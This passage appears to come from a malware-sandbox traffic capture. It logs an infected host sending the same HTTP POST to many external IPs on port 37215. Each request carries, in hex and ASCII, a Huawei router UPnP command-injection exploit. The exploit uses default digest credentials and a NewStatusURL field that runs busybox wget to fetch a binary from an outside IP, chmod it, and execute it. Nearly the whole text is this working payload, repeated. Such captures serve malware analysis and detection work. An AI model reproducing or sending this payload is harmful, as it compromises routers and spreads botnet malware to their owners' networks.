                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2476192.168.2.1556762222.17.139.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478841066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2477192.168.2.1552664181.141.154.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478852987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2478192.168.2.1540494138.213.204.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478867054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2479192.168.2.1560886157.203.214.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478887081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2480192.168.2.1560996157.31.85.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478902102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2481192.168.2.1548438190.109.246.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478920937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2482192.168.2.1542742121.132.239.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478939056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2483192.168.2.155605094.80.4.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478957891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2484192.168.2.1555222190.240.117.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478975058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2485192.168.2.1548806181.59.71.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.479008913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2486192.168.2.1551970156.162.250.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.479008913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
